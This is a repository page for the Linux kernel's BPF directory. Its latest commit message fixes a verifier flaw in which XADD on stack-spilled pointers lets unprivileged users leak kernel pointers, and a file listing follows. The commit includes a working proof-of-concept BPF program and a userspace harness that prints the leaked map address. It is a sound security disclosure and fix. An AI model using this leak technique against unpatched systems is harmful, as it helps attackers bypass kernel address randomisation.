linux_dsm_epyc7002/kernel/bpf
Jann Horn 6e7e63cbb0 bpf: Forbid XADD on spilled pointers for unprivileged users
When check_xadd() verifies an XADD operation on a pointer to a stack slot
containing a spilled pointer, check_stack_read() verifies that the read,
which is part of XADD, is valid. However, since the placeholder value -1 is
passed as `value_regno`, check_stack_read() can only return a binary
decision and can't return the type of the value that was read. The intent
here is to verify whether the value read from the stack slot may be used as
a SCALAR_VALUE; but since check_stack_read() doesn't check the type, and
the type information is lost when check_stack_read() returns, this is not
enforced, and a malicious user can abuse XADD to leak spilled kernel
pointers.
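
Concretely, the problematic path looks roughly like this (a sketch of
the then-current verifier code in kernel/bpf/verifier.c; context is
trimmed):

    /* check_xadd(): the read half of the XADD has no destination
     * register, so the placeholder -1 is passed as value_regno:
     */
    err = check_mem_access(env, insn_idx, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_READ, -1, true);

    /* For a PTR_TO_STACK base register, check_mem_access() forwards
     * this to check_stack_read(); with value_regno < 0, that function
     * can only return 0 or an error, so the type of the spilled value
     * never reaches the caller.
     */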

Fix it by letting check_stack_read() verify that the value is usable as a
SCALAR_VALUE if no type information is passed to the caller.
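
The added check in check_stack_read() then takes roughly the following
shape (a sketch based on the description above, not a verbatim diff):

    if (value_regno >= 0) {
        /* restore register state from stack */
        state->regs[value_regno] = reg_state->stack[spi].spilled_ptr;
        state->regs[value_regno].live |= REG_LIVE_WRITTEN;
    } else if (__is_pointer_value(env->allow_ptr_leaks, reg)) {
        /* If value_regno == -1, the caller is only asking whether it
         * is acceptable to use this value as a SCALAR_VALUE (e.g. for
         * XADD). Unprivileged callers must not do that with spilled
         * pointers.
         */
        verbose(env, "leaking pointer from stack off %d\n", off);
        return -EACCES;
    }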

To be able to use __is_pointer_value() in check_stack_read(), move it up.
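
For reference, __is_pointer_value() is the small helper that gates
pointer use on allow_ptr_leaks:

    static bool __is_pointer_value(bool allow_ptr_leaks,
                                   const struct bpf_reg_state *reg)
    {
        if (allow_ptr_leaks)
            return false;

        return reg->type != SCALAR_VALUE;
    }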

Fix up the expected unprivileged error message for a BPF selftest that,
until now, assumed that unprivileged users can use XADD on stack-spilled
pointers. This also gives us a test for the behavior introduced in this
patch for free.

In theory, this could also be fixed by forbidding XADD on stack spills
entirely, since XADD is a locked operation (for operations on memory with
concurrency) and there can't be any concurrency on the BPF stack; but
Alexei has said that he wants to keep XADD on stack slots working to avoid
changes to the test suite [1].

The following BPF program demonstrates how to leak a BPF map pointer as an
unprivileged user using this bug:

    // r7 = map_pointer
    BPF_LD_MAP_FD(BPF_REG_7, small_map),
    // r8 = launder(map_pointer)
    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_7, -8),
    BPF_MOV64_IMM(BPF_REG_1, 0),
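    // Raw encoding of a BPF_XADD (atomic add) of r1 == 0 into fp-8:
    // at runtime the spilled pointer's bytes are unchanged, but the
    // verifier's read half goes through check_stack_read() with
    // value_regno == -1, so the slot's pointer type is never checked.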
    ((struct bpf_insn) {
      .code  = BPF_STX | BPF_DW | BPF_XADD,
      .dst_reg = BPF_REG_FP,
      .src_reg = BPF_REG_1,
      .off = -8
    }),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_FP, -8),

    // store r8 into map
    BPF_MOV64_REG(BPF_REG_ARG1, BPF_REG_7),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
    BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
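
Once the program has run, the laundered pointer sits in the map and can
be read back from userspace. A minimal, hypothetical harness (assuming
small_map is the fd of an ARRAY map with 4-byte keys and 8-byte values,
and using libbpf's bpf_map_lookup_elem()):

    #include <stdio.h>
    #include <bpf/bpf.h>

    /* Read the leaked kernel pointer out of value slot 0. */
    static void dump_leak(int small_map)
    {
        __u32 key = 0;
        __u64 leaked = 0;

        if (!bpf_map_lookup_elem(small_map, &key, &leaked))
            printf("leaked map pointer: 0x%llx\n",
                   (unsigned long long)leaked);
    }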

[1] https://lore.kernel.org/bpf/20200416211116.qxqcza5vo2ddnkdq@ast-mbp.dhcp.thefacebook.com/

Fixes: 17a5267067 ("bpf: verifier (add verifier core)")
Signed-off-by: Jann Horn <jannh@google.com>
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
Link: https://lore.kernel.org/bpf/20200417000007.10734-1-jannh@google.com
2020-04-20 18:41:34 -07:00
arraymap.c bpf: Add lookup and update batch ops to arraymap 2020-01-15 14:00:35 -08:00
bpf_lru_list.c treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
bpf_lru_list.h bpf: Fix a typo "inacitve" -> "inactive" 2020-04-06 21:54:10 +02:00
bpf_lsm.c bpf: lsm: Implement attach, detach and execution 2020-03-30 01:34:00 +02:00
bpf_struct_ops_types.h bpf: tcp: Support tcp_congestion_ops in bpf 2020-01-09 08:46:18 -08:00
bpf_struct_ops.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net 2020-03-25 18:58:11 -07:00
btf.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next 2020-03-30 19:52:37 -07:00
cgroup.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf-next 2020-03-30 19:52:37 -07:00
core.c bpf: Enable bpf cgroup hooks to retrieve cgroup v2 and ancestor id 2020-03-27 19:40:39 -07:00
cpumap.c cpumap: Avoid warning when CONFIG_DEBUG_PER_CPU_MAPS is enabled 2020-04-20 18:38:04 -07:00
devmap.c bpf, xdp: Remove no longer required rcu_read_{un}lock() 2020-01-27 11:16:25 +01:00
disasm.c treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 295 2019-06-05 17:36:38 +02:00
disasm.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 295 2019-06-05 17:36:38 +02:00
dispatcher.c bpf: Remove bpf_image tree 2020-03-13 12:49:52 -07:00
hashtab.c bpf: Replace zero-length array with flexible-array member 2020-02-28 01:21:02 +01:00
helpers.c bpf: Enable bpf cgroup hooks to retrieve cgroup v2 and ancestor id 2020-03-27 19:40:39 -07:00
inode.c bpf: Introduce pinnable bpf_link abstraction 2020-03-02 22:06:27 -08:00
local_storage.c Merge git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net 2019-12-22 09:54:33 -08:00
lpm_trie.c bpf: Replace zero-length array with flexible-array member 2020-02-28 01:21:02 +01:00
Makefile bpf: Introduce BPF_PROG_TYPE_LSM 2020-03-30 01:34:00 +02:00
map_in_map.c bpf: Introduce BPF_MAP_TYPE_STRUCT_OPS 2020-01-09 08:46:18 -08:00
map_in_map.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
offload.c bpf, offload: Replace bitwise AND by logical AND in bpf_prog_offload_info_fill 2020-02-17 16:53:49 +01:00
percpu_freelist.c bpf: Don't iterate over possible CPUs with interrupts disabled 2020-02-24 16:18:20 -08:00
percpu_freelist.h treewide: Replace GPLv2 boilerplate/reference with SPDX - rule 206 2019-05-30 11:29:53 -07:00
queue_stack_maps.c bpf: move memory size checks to bpf_map_charge_init() 2019-05-31 16:52:56 -07:00
reuseport_array.c net: Generate reuseport group ID on group creation 2020-02-21 22:29:45 +01:00
stackmap.c bpf/stackmap: Don't trylock mmap_sem with PREEMPT_RT and interrupts disabled 2020-02-24 16:20:10 -08:00
syscall.c bpf: Prevent re-mmap()'ing BPF map as writable for initially r/o mapping 2020-04-14 21:28:57 +02:00
sysfs_btf.c bpf: Support llvm-objcopy for vmlinux BTF 2020-03-19 12:32:38 +01:00
tnum.c bpf: Verifier, do explicit ALU32 bounds tracking 2020-03-30 14:59:53 -07:00
trampoline.c bpf: lsm: Implement attach, detach and execution 2020-03-30 01:34:00 +02:00
verifier.c bpf: Forbid XADD on spilled pointers for unprivileged users 2020-04-20 18:41:34 -07:00
xskmap.c xsk: Make xskmap flush_list common for all map instances 2019-12-19 21:09:43 -08:00